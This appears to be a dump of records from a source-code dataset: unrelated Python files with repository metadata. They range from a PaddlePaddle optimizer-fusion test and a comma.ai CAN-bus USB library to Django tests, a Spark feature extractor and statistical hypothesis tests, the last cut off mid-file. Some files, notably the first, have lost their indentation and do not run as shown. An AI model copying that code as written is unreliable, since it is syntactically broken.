|
Apache-2.0
| 2023-04-04T02:42:53
| 2019-07-11T03:51:12
|
Python
|
UTF-8
|
Python
| false
| false
| 3,358
|
py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.distributed.fleet as fleet
import numpy as np
import paddle.nn as nn
from paddle.distributed.passes import new_pass, PassManager
import unittest
from dist_pass_test_base import DistPassTestBase
class DemoNet(nn.Layer):
def __init__(self):
super(DemoNet, self).__init__()
self.conv1 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
self.bn1 = nn.BatchNorm2D(8, data_format="NHWC")
self.relu = nn.ReLU()
def forward(self, x):
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = paddle.flatten(out, 1)
return out
class TestFuseAdamPass(DistPassTestBase):
def init(self):
self.atol = 1e-4
self.rtol = 1e-4
def get_model(self, place, batch_size=32, image_shape=[224, 224, 3]):
image = paddle.static.data(shape=[batch_size] + image_shape,
dtype='float32',
name='image')
model = DemoNet()
pred_out = model(image)
loss = paddle.mean(pred_out)
optimizer = paddle.optimizer.Adam(learning_rate=1e-3)
dist_strategy = fleet.DistributedStrategy()
dist_strategy.fuse_all_reduce_ops = False
dist_strategy.without_graph_optimization = True
fleet.init(is_collective=True, strategy=dist_strategy)
optimizer = fleet.distributed_optimizer(optimizer)
optimizer.minimize(loss)
rank = paddle.distributed.get_rank()
def reader():
seed = int(os.environ.get("SEED", 0))
np.random.seed(seed + rank)
for _ in range(10):
image_np = np.random.random(size=image.shape).astype('float32')
yield image_np,
main_program = paddle.static.default_main_program()
startup_program = paddle.static.default_startup_program()
return main_program, startup_program, [image], [loss], reader
def apply_passes(self, main_prog, startup_prog):
pass_manager = PassManager([new_pass("fuse_optimizer")])
pass_manager.apply([main_prog], [startup_prog])
print(pass_manager.names)
op_type = []
for op in main_prog.global_block().ops:
op_type.append(op.type)
if op.type == "adam":
self.assertTrue("@FUSEDVAR@_adam_Param_batch_norm2d_0.b_0" in
op.input("Param"))
self.assertTrue("@FUSEDVAR@_adam_Grad_batch_norm2d_0.b_0@GRAD"
in op.input("Grad"))
self.assertTrue("coalesce_tensor" in op_type)
def test_fuse_adam(self):
self.check_main()
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
jiweibo.noreply@github.com
|
37818cd5fcee6a28165e777da8c232aab06642b5
|
7740adda52651a443e5141b331d4eaadbd0d0d2c
|
/chap11/11-5.py
|
a1ff82139212f7ae8500386e95508159daeca5f9
|
[] |
no_license
|
wucy/pythonhomework
|
f55b24e6e702718243f8cd534dc7d3c2eb9f9fce
|
1cfcac532a229ce71982ed3cfef9f75a531ffa64
|
refs/heads/master
| 2016-09-10T20:30:37.367056
| 2013-11-28T14:20:03
| 2013-11-28T14:20:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
#!/usr/bin/env python
def invert_dict(hist):
ret = dict()
for key in hist:
ret.setdefault(hist[key], []).append(key)
return ret
print invert_dict({'a':1, 'b':2, 'c':2})
|
[
"chunyang506@gmail.com"
] |
chunyang506@gmail.com
|
a648cbdbf5a1d98beba96b3483ee9e97504bb830
|
fcf91774105f020482c3c07632c0ee462a6d1394
|
/uwiki/web.py
|
57dd594e358c2811ee30d858e2da8fbd0247f7c4
|
[] |
no_license
|
mikeboers/uWiki
|
fcac466e82d16b2ed219d06b834b766e7a9de43e
|
3c9b0a7ab07a550f52f5d5d38105df901d5a3801
|
refs/heads/master
| 2023-06-08T05:53:50.066814
| 2018-03-05T18:03:45
| 2018-03-05T18:03:45
| 15,181,192
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 179
|
py
|
import logging
logging.basicConfig()
from .core import app
from .errors import setup_errors
setup_errors(app)
# Finally register controllers here.
from . import controllers
|
[
"github@mikeboers.com"
] |
github@mikeboers.com
|
5d90971c9ca58a4817368468e0ff0c99c19b099e
|
14438f8c8bb4250a7fa8da0ecd40c5a4902bdfcd
|
/Player/set-17/165.py
|
9a3d792ecbd4593b145a5f3556d0c0b9183b56ef
|
[] |
no_license
|
nikhilvarshney2/GUVI
|
c51b1fa3bd1026eb74fc536e938a14c2e92089b2
|
79717ae5b26540101169e512204fb7236f7c839f
|
refs/heads/master
| 2020-04-01T00:40:27.699963
| 2019-04-30T13:46:46
| 2019-04-30T13:46:46
| 152,707,542
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 150
|
py
|
n,u = map(int,input().split())
kl = list(map(int,input().split()))
found = 100000
for i in kl:
if i>u and i<found:
found = i
print(found)
|
[
"nikhilvarshney9292@gmail.com"
] |
nikhilvarshney9292@gmail.com
|
5a9d027ff8cc18ecab56ba138f3d711c9d7f3eff
|
64a673e2e84c962ae4ab312b7f011e13f7d2df55
|
/lib/panda.py
|
516fb243713e658ac807e6c24b5e57f96070de17
|
[
"MIT"
] |
permissive
|
ScienceXChina/panda
|
c00960901246627d643cdf33ee81066988a15fdb
|
efca3f70939d4c2d3c8c0901536e9d89a5bbcbd6
|
refs/heads/master
| 2021-01-19T20:50:57.597486
| 2017-04-18T01:17:34
| 2017-04-18T01:17:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,274
|
py
|
# python library to interface with panda
import struct
import usb1
from usb1 import USBErrorIO, USBErrorOverflow
class Panda(object):
def __init__(self, serial=None, claim=True):
context = usb1.USBContext()
self.handle = None
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
if serial is None or device.getSerialNumber() == serial:
print "opening device", device.getSerialNumber()
self.handle = device.open()
if claim:
self.handle.claimInterface(0)
break
assert self.handle != None
@staticmethod
def list():
context = usb1.USBContext()
ret = []
for device in context.getDeviceList(skip_on_error=True):
if device.getVendorID() == 0xbbaa and device.getProductID() == 0xddcc:
ret.append(device.getSerialNumber())
return ret
# ******************* health *******************
def health(self):
dat = self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xd2, 0, 0, 0x20)
a = struct.unpack("IIBBBBB", dat)
return {"voltage": a[0], "current": a[1],
"started": a[2], "controls_allowed": a[3],
"gas_interceptor_detected": a[4],
"started_signal_detected": a[5],
"started_alt": a[6]}
# ******************* can *******************
def set_gmlan(self, on):
if on:
self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xdb, 1, 0, '')
else:
self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xdb, 0, 0, '')
def can_send_many(self, arr):
snds = []
for addr, _, dat, bus in arr:
snd = struct.pack("II", ((addr << 21) | 1), len(dat) | (bus << 4)) + dat
snd = snd.ljust(0x10, '\x00')
snds.append(snd)
while 1:
try:
self.handle.bulkWrite(3, ''.join(snds))
break
except (USBErrorIO, USBErrorOverflow):
print "CAN: BAD SEND MANY, RETRYING"
def can_send(self, addr, dat, bus):
self.can_send_many([[addr, None, dat, bus]])
def can_recv(self):
def __parse_can_buffer(dat):
ret = []
for j in range(0, len(dat), 0x10):
ddat = dat[j:j+0x10]
f1, f2 = struct.unpack("II", ddat[0:8])
ret.append((f1 >> 21, f2>>16, ddat[8:8+(f2&0xF)], (f2>>4)&0xf))
return ret
dat = ""
while 1:
try:
dat = self.handle.bulkRead(1, 0x10*256)
break
except (USBErrorIO, USBErrorOverflow):
print "CAN: BAD RECV, RETRYING"
return __parse_can_buffer(dat)
# ******************* serial *******************
def serial_read(self, port_number):
return self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, port_number, 0, 0x100)
def serial_write(self, port_number):
return self.handle.bulkWrite(2, chr(port_number) + ln)
# ******************* kline *******************
# pulse low for wakeup
def kline_wakeup(self):
ret = self.handle.controlWrite(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xf0, 0, 0, "")
def kline_drain(self, bus=2):
# drain buffer
bret = ""
while 1:
ret = self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, bus, 0, 0x100)
if len(ret) == 0:
break
bret += str(ret)
return bret
def kline_ll_recv(self, cnt, bus=2):
echo = ""
while len(echo) != cnt:
echo += str(self.handle.controlRead(usb1.TYPE_VENDOR | usb1.RECIPIENT_DEVICE, 0xe0, bus, 0, cnt-len(echo)))
return echo
def kline_send(self, x, bus=2, checksum=True):
def get_checksum(dat):
result = 0
result += sum(map(ord, dat))
result = -result
return chr(result&0xFF)
self.kline_drain(bus=bus)
if checksum:
x += get_checksum(x)
for i in range(0, len(x), 0x10):
ts = x[i:i+0x10]
self.handle.bulkWrite(2, chr(bus)+ts)
echo = self.kline_ll_recv(len(ts), bus=bus)
if echo != ts:
print "**** ECHO ERROR %d ****" % i
print echo.encode("hex")
print ts.encode("hex")
assert echo == ts
def kline_recv(self, bus=2):
msg = self.kline_ll_recv(2, bus=bus)
msg += self.kline_ll_recv(ord(msg[1])-2, bus=bus)
return msg
|
[
"george@comma.ai"
] |
george@comma.ai
|
2224a59c364b7d23fe7e1fda9e1c4882185ad1a2
|
7c8bff784568691c516833ac81afc967857d24e2
|
/jacc/migrations/0013_auto_20180329_1052.py
|
416bb15ffddf4f84db0de59def8ab08f641d0a94
|
[
"MIT"
] |
permissive
|
kajala/django-jacc
|
b71f2c3df1321b9bb31e1e648895931b735949a6
|
4acb8ca2d32b11fd5afa3b5316b13be223b20ec6
|
refs/heads/develop
| 2023-08-18T14:12:38.196880
| 2023-08-11T15:18:57
| 2023-08-11T15:18:57
| 121,229,896
| 11
| 5
|
MIT
| 2021-07-12T15:02:36
| 2018-02-12T10:02:20
|
Python
|
UTF-8
|
Python
| false
| false
| 458
|
py
|
# Generated by Django 2.0.2 on 2018-03-29 10:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("jacc", "0012_auto_20180218_0638"),
]
operations = [
migrations.AlterField(
model_name="invoice",
name="number",
field=models.BigIntegerField(blank=True, db_index=True, default=None, null=True, verbose_name="invoice number"),
),
]
|
[
"kajala@gmail.com"
] |
kajala@gmail.com
|
832aa0d3c90861062ce69cb90cf22a074676b793
|
0e2994b2b6ffe318081274eff6425573f1ab953e
|
/argus-freesound-master/stacking_kernel_template.py
|
5872f6d63621c45783150d2611f315b29cf299b0
|
[
"MIT"
] |
permissive
|
Ramstein/castme-transform-prediction-via-adversarial-network
|
4f6b1f3c953c9686ca2a77aef27891089e9a687e
|
361369fcb75f7c90b3e276d88e547cbba3402ea6
|
refs/heads/master
| 2023-07-15T14:12:18.842595
| 2021-09-07T18:08:01
| 2021-09-07T18:08:01
| 404,077,475
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 579
|
py
|
import gzip
import base64
import os
from pathlib import Path
from typing import Dict
KERNEL_MODE = "predict"
# this is base64 encoded source code
file_data: Dict = {file_data}
for path, encoded in file_data.items():
print(path)
path = Path(path)
path.parent.mkdir(parents=True, exist_ok=True)
path.write_bytes(gzip.decompress(base64.b64decode(encoded)))
def run(command):
os.system('export PYTHONPATH=${PYTHONPATH}:/kaggle/working && '
f'export MODE={KERNEL_MODE} && ' + command)
run('python stacking_predict.py')
run('rm -rf argus src')
|
[
"gerialworld@gmail.com"
] |
gerialworld@gmail.com
|
2f1de19f501102cdfb600897d1579f3d81ec4fa5
|
e376eb34db5eaf17608f2ebf22ecd796b836a7b1
|
/HW2/test-svm.py
|
8d0329207c8d1943a577aa163eee04f3156d8646
|
[] |
no_license
|
yshsu0918/MachineLearning2020
|
5b8babad41d9d377d0ccf33b4b4a1c4e6e572bfa
|
f953492ae85941d81f675eaa21daf8fadfa227b3
|
refs/heads/master
| 2023-02-11T18:44:11.319760
| 2020-12-25T03:53:49
| 2020-12-25T03:53:49
| 324,283,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,837
|
py
|
from sklearn import svm
import numpy as np
import struct
import time
def decode_idx3_ubyte(idx3_ubyte_file,dataset_size):
f = open(idx3_ubyte_file, 'rb').read()
mem_offset = 16
images = []
for i in range(dataset_size):
if (i+1) % (dataset_size/100) == 0:
print('#', end='')
images.append( np.array(struct.unpack_from('>784B', f, mem_offset)).reshape((28, 28)))
mem_offset += (784)
return images
def decode_idx1_ubyte(idx1_ubyte_file,dataset_size):
f = open(idx1_ubyte_file, 'rb').read()
mem_offset = 8
labels = []
for i in range(dataset_size):
if (i+1) % (dataset_size/100) == 0:
print('#', end='')
labels.append( struct.unpack_from('>B', f, mem_offset)[0] )
mem_offset += 1
return labels
train_image = decode_idx3_ubyte('train-images.idx3-ubyte',60000)
train_label = decode_idx1_ubyte('train-labels.idx1-ubyte',60000)
print('load train done')
test_image = decode_idx3_ubyte('t10k-images.idx3-ubyte',10000)
test_label = decode_idx1_ubyte('t10k-labels.idx1-ubyte',10000)
print('load test done')
#mnist = input_data.read_data_sets('MNIST_data', one_hot=False)
train_num = 60000
test_num = 10000
x_train = [ x.reshape(28*28) for x in train_image]
y_train = train_label
x_test = [ x.reshape(28*28) for x in test_image]
y_test = test_label
tStart = time.time()
# 獲取一個支援向量機模型
print('1')
predictor = svm.SVC(kernel='linear', verbose=True, max_iter = 1000)
# 把資料丟進去
print('2')
predictor.fit(x_train[:train_num], y_train[:train_num])
# 預測結果
print('3')
result = predictor.predict(x_test[:test_num])
# 準確率估計
print('4')
accurancy = np.sum(np.equal(result, y_test[:test_num])) / test_num
print(accurancy)
tEnd = time.time()
print('SVM use {} seconds'.format(tEnd - tStart))
|
[
"a@b.c"
] |
a@b.c
|
6b04c699eb03528f3243f106a6d49ded0dc8d86a
|
cda0f7f4e9e19aeb03148b71b9e4ac924a4b4814
|
/onspark_generate_feature_user.py
|
ca86b74cb9b58f4ddeff0f30aece89b7ac8ba727
|
[] |
no_license
|
00fq00/competition_tianchi
|
32a4f59340d96955d8056daa5fe67d6079c36f8e
|
fb45aaa412ddba5b69555ecfd75c3aa462fe2489
|
refs/heads/master
| 2021-01-19T21:12:41.887958
| 2017-03-03T09:00:27
| 2017-03-03T09:00:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,331
|
py
|
# -*- coding: utf-8 -*-
import sys
from operator import add
from pyspark import SparkConf
from pyspark import SparkContext
from sklearn.svm import SVC
from sklearn.svm import LinearSVC
from sklearn.pipeline import Pipeline
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
####################################################################################
############################ 用户特征 ############################
####################################################################################
def extract1(line):
import time
(uid, iid, ict) = line.strip().split("\t")[0].split(" ")
items = filter(lambda x:x[0]>0, [(int(time.mktime(time.strptime('2014-'+etime,'%Y-%m-%d-%H'))-time.mktime(time.strptime('2014-'+i.split(",")[0],'%Y-%m-%d-%H')))/(24*3600)+1, int(i.split(",")[1])) for i in line.strip().split("\t")[1].split(" ")])
return (uid,items)
def extract2(items_list):
import itertools
items, items_buy, items_buy_3, f, inf = [], [], [], [0]*39, 100
f[32] = len(items_list) # 交互商品数
for i in items_list:
if len(filter(lambda x:x[1]==4,i))>0:
items_buy.append(i)
if len(filter(lambda x:x[1]==4 and x[0]<=3,i))>0:
items_buy_3.append(i)
items.extend(i)
f[33] = len(items_buy) # 购买商品数
f[34] = len(items_buy_3) # 三天内购买商品数
f[35] = len(filter(lambda x:len(x)==1,items_list)) # 只有过一次交互的商品数
f[36] = len(filter(lambda x:len(x)==2,items_list)) # 有过两次交互的商品数
f[37] = len(filter(lambda x:len(x)==3,items_list)) # 有过三次交互的商品数
items = sorted(items, key=lambda x:x[0], reverse=True)
buy = filter(lambda x:x[1]==4, items)
last = buy[-1][0] if len(buy)!=0 else inf
f[24] = len(filter(lambda x:x[0]<=1 and x[1]==1, items)) # 最后1天点击次数
f[25] = len(filter(lambda x:x[0]<=1 and x[1]==2, items)) # 最后1天加收次数
f[26] = len(filter(lambda x:x[0]<=1 and x[1]==3, items)) # 最后1天加购次数
f[27] = len(filter(lambda x:x[0]<=1 and x[1]==4, items)) # 最后1天购买次数
f[28] = len(filter(lambda x:x[0]<=3 and x[1]==1, items)) # 最后3天点击次数
f[29] = len(filter(lambda x:x[0]<=3 and x[1]==2, items)) # 最后3天加收次数
f[30] = len(filter(lambda x:x[0]<=3 and x[1]==3, items)) # 最后3天加购次数
f[31] = len(filter(lambda x:x[0]<=3 and x[1]==4, items)) # 最后3天购买次数
f[0] = len(filter(lambda x:x[0]<=7 and x[1]==1, items)) # 最后1周点击次数
f[1] = len(filter(lambda x:x[0]<=7 and x[1]==2, items)) # 最后1周加收次数
f[2] = len(filter(lambda x:x[0]<=7 and x[1]==3, items)) # 最后1周加购次数
f[3] = len(filter(lambda x:x[0]<=7 and x[1]==4, items)) # 最后1周购买次数
f[4] = len(filter(lambda x:x[0]<=21 and x[1]==1, items)) # 最后3周点击次数
f[5] = len(filter(lambda x:x[0]<=21 and x[1]==2, items)) # 最后3周加收次数
f[6] = len(filter(lambda x:x[0]<=21 and x[1]==3, items)) # 最后3周加购次数
f[7] = len(filter(lambda x:x[0]<=21 and x[1]==4, items)) # 最后3周购买次数
f[8] = min(1.0,round(1.0*f[3]/f[0],4)) if f[0]!=0 else 0.0 # 最后1周点击转化率
f[9] = min(1.0,round(1.0*f[3]/f[1],4)) if f[1]!=0 else 0.0 # 最后1周加收转化率
f[10] = min(1.0,round(1.0*f[3]/f[2],4)) if f[2]!=0 else 0.0 # 最后1周加购转化率
f[11] = min(1.0,round(1.0*f[7]/f[4],4)) if f[4]!=0 else 0.0 # 最后3周点击转化率
f[12] = min(1.0,round(1.0*f[7]/f[5],4)) if f[5]!=0 else 0.0 # 最后3周加收转化率
f[13] = min(1.0,round(1.0*f[7]/f[6],4)) if f[6]!=0 else 0.0 # 最后3周加购转化率
f[14] = last # 最后一次购买距离天数
f[15] = len(set([item[0] for item in items if item[0]<=3])) # 最后3天内交互天数
f[16] = len(set([item[0] for item in items if item[0]<=7])) # 最后1周内交互天数
f[17] = len(set([item[0] for item in items if item[0]<=21])) # 最后3周内交互天数
f[18] = items[-1][0] if len(items)!=0 else inf # 最后1次交互距离天数
inter = [len(list(i)) for _,i in itertools.groupby(items, lambda x: x[0])]
f[19] = len(inter) #交互天数
f[20] = max(inter) if len(inter)!=0 else 0 #交互最多的一天交互次数
f[21] = len(filter(lambda x:x[0]<=1 and x[1]==4, items)) # 最后1天购买次数
f[22] = len(filter(lambda x:x[0]<=3 and x[1]==4, items)) # 最后3天购买次数
f[23] = len(filter(lambda x:x[0]<=7 and x[1]==4, items)) # 最后7天购买次数
f[38] = round(1.0*len(items)/f[32],4) if f[32]!=0 else 0.0 # 用户对每件商品的平均交互次数
return "\t".join([str(i) for i in f])
global etime
global subset
if __name__ == "__main__":
import fileinput
conf = (SparkConf()
.setMaster("spark://namenode.omnilab.sjtu.edu.cn:7077")
.setAppName("Extract")
.set("spark.cores.max", "32")
.set("spark.driver.memory", "4g")
.set("spark.executor.memory", "6g"))
sc = SparkContext(conf = conf)
lines = sc.textFile('hdfs://namenode.omnilab.sjtu.edu.cn/user/qiangsiwei/competition_tianchi/uid_iid', 1)
target, etime, subset = "12-19-0", "12-18-23", {}
# target, etime, subset = "12-18-0", "12-17-23", {}
# target, etime, subset = "12-17-0", "12-16-23", {}
# target, etime, subset = "12-16-0", "12-15-23", {}
# target, etime, subset = "12-15-0", "12-14-23", {}
# target, etime, subset = "12-14-0", "12-13-23", {}
# target, etime, subset = "12-13-0", "12-12-23", {}
# target, etime, subset = "12-12-0", "12-11-23", {}
# target, etime, subset = "12-11-0", "12-10-23", {}
# target, etime, subset = "12-10-0", "12-09-23", {}
# target, etime, subset = "12-09-0", "12-08-23", {}
# target, etime, subset = "12-08-0", "12-07-23", {}
# target, etime, subset = "12-07-0", "12-06-23", {}
# target, etime, subset = "12-06-0", "12-05-23", {}
# target, etime, subset = "12-05-0", "12-04-23", {}
# target, etime, subset = "12-04-0", "12-03-23", {}
# target, etime, subset = "12-03-0", "12-04-23", {}
# target, etime, subset = "12-02-0", "12-01-23", {}
# target, etime, subset = "12-01-0", "11-30-23", {}
for line in fileinput.input("./tianchi_mobile_recommend_train_item.csv"):
subset[line.split(",")[0]] = True
counts = lines.map(lambda x : extract1(x))\
.groupByKey()\
.map(lambda x : x[0]+"\t"+extract2(x[1]))
output = counts.saveAsTextFile("./competition_tianchi/feature/"+target+"/user/")
|
[
"mqiang@splunk.com"
] |
mqiang@splunk.com
|
479a840a61ac23a2b6d04a1d92edc8556addd410
|
f5ca706ea5fd000ebdd230b4c828d98540009b85
|
/Problem Solving/Strings/Funny String.py
|
14b5568074ebb390445b514074806155920e1755
|
[] |
no_license
|
xtanmaygarg/HackerRankSolutions
|
a6fc72dcd165197c268d28d3f41bd022b5983b8b
|
ce973b9b1f90e7e39092ecc988333904afb0cda5
|
refs/heads/master
| 2021-01-01T08:57:24.586457
| 2020-07-12T21:04:57
| 2020-07-12T21:04:57
| 239,206,459
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 801
|
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the funnyString function below.
def funnyString(s):
t = s[::-1]
s = list(s)
t = list(t)
sl = []
tl = []
fl = []
gl = []
for i in s:
sl.append(ord(i))
for i in t:
tl.append(ord(i))
for i in range(0,len(sl)-1):
fl.append(abs(sl[i+1] - sl[i]))
for i in range(0,len(tl)-1):
gl.append(abs(tl[i+1] - tl[i]))
#print(gl)
print(fl)
if fl == gl:
return "Funny"
else:
return "Not Funny"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
s = input()
result = funnyString(s)
fptr.write(result + '\n')
fptr.close()
|
[
"xtanmaygarg@gmail.com"
] |
xtanmaygarg@gmail.com
|
48ff9ba9d3dbeab6f4e525a151aa67190e43cc72
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/nistData/atomic/double/Schema+Instance/NISTXML-SV-IV-atomic-double-enumeration-2-3.py
|
9d0ef3892cc0f445eb1ee3592e91bca8ebbf63df
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917
| 2023-07-29T17:10:13
| 2023-07-30T12:11:13
| 239,622,251
| 2
| 0
|
MIT
| 2023-07-25T14:19:04
| 2020-02-10T21:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 534
|
py
|
from output.models.nist_data.atomic.double.schema_instance.nistschema_sv_iv_atomic_double_enumeration_2_xsd.nistschema_sv_iv_atomic_double_enumeration_2 import NistschemaSvIvAtomicDoubleEnumeration2
from output.models.nist_data.atomic.double.schema_instance.nistschema_sv_iv_atomic_double_enumeration_2_xsd.nistschema_sv_iv_atomic_double_enumeration_2 import NistschemaSvIvAtomicDoubleEnumeration2Type
obj = NistschemaSvIvAtomicDoubleEnumeration2(
value=NistschemaSvIvAtomicDoubleEnumeration2Type.VALUE_2_7311892445441031_E36
)
|
[
"tsoulloftas@gmail.com"
] |
tsoulloftas@gmail.com
|
ff2cada24b0e31d5d867122eea1da07532fd6a5a
|
c5347d37f7d8018c2e6161de265ed5ced7deab51
|
/budget/tests/test_views.py
|
192c634a250860c534d8ef233e33ce3c6a002e91
|
[
"MIT"
] |
permissive
|
davidlares/budget-webapp-django-testing
|
db3f1d5f6f90ccc357271cbe02becf31d4d38355
|
330039ba8a34e14afc96050a5cb9494380edbe84
|
refs/heads/master
| 2022-01-12T15:50:53.638288
| 2019-05-10T14:27:05
| 2019-05-10T14:27:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,607
|
py
|
from django.test import TestCase, Client
from django.urls import reverse
from budget.models import Project, Category, Expense
import json
class TestViews(TestCase):
# runs before any test here
def setUp(self):
self.client = Client() # creating a client
self.list_url = reverse('list')
self.detail_url = reverse('detail', args=['desktop-app'])
# creating a object for getting the slug correctly (override save method)
self.desktopapp = Project.objects.create(
name = "Desktop app",
budget = 10000
)
# GET methods
def test_project_list_get(self):
response = self.client.get(self.list_url) # setting up the client
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'budget/project-list.html')
def test_project_detail_get(self):
response = self.client.get(self.detail_url) # setting up the client
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'budget/project-detail.html')
# POST methods
def test_project_detail_POST_new_expense(self):
Category.objects.create (
project = self.desktopapp,
name = 'development'
)
response = self.client.post(self.detail_url, {
'title': 'expense1',
'amount': 1000,
'category': 'development'
})
# because the view redirection
self.assertEquals(response.status_code, 302)
# getting the project
self.assertEquals(self.desktopapp.expenses.first().title, 'expense1')
#empty
def test_project_detail_post_no_data(self):
response = self.client.post(self.detail_url)
# because the view redirection
self.assertEquals(response.status_code, 302)
# getting the project
self.assertEquals(self.desktopapp.expenses.count(), 0)
# DELETE methods
def test_project_detail_delete_expense(self):
category1 = Category.objects.create (
project = self.desktopapp,
name = 'development'
)
Expense.objects.create(
project = self.desktopapp,
title = 'expense1',
amount = 1000,
category = category1
)
response = self.client.delete(self.detail_url, json.dumps({
'id': 1
# the created expense ID
}))
# intensional broken = should be 302
self.assertEquals(response.status_code, 204)
self.assertEquals(self.desktopapp.expenses.count(), 0)
|
[
"="
] |
=
|
39880a9d9db55971218551a7facfbd7b50fc34e2
|
2e5936c3877e96d39f52045a403b658be41b2e1e
|
/meanmax/stats/test.py
|
5debe41403987fe96ba9687a5b7bddd067501f6a
|
[
"MIT"
] |
permissive
|
castorini/meanmax
|
32b71c36b39a30107ae288ba9ae815d630c1b4db
|
0ea124105eda04a00677c077b591a94c2e2b2936
|
refs/heads/master
| 2022-05-17T03:31:00.320904
| 2020-04-29T02:27:15
| 2020-04-29T02:27:15
| 258,859,401
| 11
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,951
|
py
|
from dataclasses import dataclass, field
from typing import Any, Dict
from scipy import stats
import numpy as np
from .estimator import QuantileEstimator
from .utils import compute_pr_x_ge_y
from .tables import MANN_WHITNEY_UP010
@dataclass(frozen=True)
class TwoSampleHypothesisTest(object):
options: Dict[str, Any] = field(default_factory=dict)
@property
def name(self):
raise NotImplementedError
def __hash__(self):
return hash(self.name)
def __eq__(self, other):
return self.name == other.name
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
raise NotImplementedError
@dataclass(frozen=True)
class StudentsTTest(TwoSampleHypothesisTest):
@property
def name(self):
if not self.options.get('equal_var'):
return 'Welch\'s t-test'
else:
return 't-test'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
t, p = stats.ttest_ind(sample1, sample2, **self.options)
return p / 2 < alpha and t < 0, t, p
@dataclass(frozen=True)
class SDBootstrapTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Stochastic Dominance Bootstrap'
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
iters = self.options.get('iters', 1000)
gt = compute_pr_x_ge_y(sample1, sample2)
sample = np.concatenate((sample1, sample2))
n = len(sample1)
stats = []
for _ in range(iters):
np.random.shuffle(sample)
sample1 = sample[:n]
sample2 = sample[n:]
stats.append(compute_pr_x_ge_y(sample1, sample2))
p = np.mean(np.array(stats) <= gt)
return p < alpha, p, p
@dataclass(frozen=True)
class MannWhitneyUTest(TwoSampleHypothesisTest):
@property
def name(self):
return 'Mann-Whitney U test'
def __post_init__(self):
if 'alternative' not in self.options:
self.options['alternative'] = 'less'
def exact_test(self, s1, s2):
s1 = [(x, 0) for x in s1]
s2 = [(x, 1) for x in s2]
n = len(s1)
m = len(s2)
s = sorted(s1 + s2)
ranksum1 = 0
ranksum2 = 0
tmp_ranksum = 0
n_ranksum = 0
counts = [0, 0]
last_x = -1000000
for rank, (x, l) in enumerate(s):
if x != last_x and n_ranksum > 0:
ranksum1 += (tmp_ranksum / n_ranksum) * counts[0]
ranksum2 += (tmp_ranksum / n_ranksum) * counts[1]
tmp_ranksum = 0
n_ranksum = 0
counts = [0, 0]
counts[l] += 1
tmp_ranksum += rank + 1
n_ranksum += 1
last_x = x
if n_ranksum > 0:
ranksum1 += (tmp_ranksum / n_ranksum) * counts[0]
ranksum2 += (tmp_ranksum / n_ranksum) * counts[1]
U1 = (n * m) + (n * (n + 1)) / 2 - ranksum1
U2 = (n * m) + (m * (m + 1)) / 2 - ranksum2
U = min(U1, U2)
return U, 0.05 if U <= MANN_WHITNEY_UP010[n - 1][m - 1] and ranksum1 < ranksum2 else 0.051
def test(self, sample1: np.ndarray, sample2: np.ndarray, alpha=0.05):
if len(sample1) <= 20 or len(sample2) <= 20:
U, p = self.exact_test(sample1, sample2)
else:
U, p = stats.mannwhitneyu(sample1, sample2, **self.options)
return p <= alpha, U, p
@dataclass(frozen=True)
class QuantileTest(TwoSampleHypothesisTest):
def __post_init__(self):
if 'quantile' not in self.options:
self.options['quantile'] = 0.5
if 'bootstrap_samples' not in self.options:
self.options['bootstrap_samples'] = 2000
if 'estimate_method' not in self.options:
self.options['estimate_method'] = 'harrelldavis'
if 'alternative' not in self.options:
self.options['alternative'] = 'less'
@property
def name(self):
if self.options['estimate_method'] == 'harrelldavis':
return 'Harrell-Davis quantile test'
if self.options['estimate_method'] == 'direct':
return 'Direct quantile test'
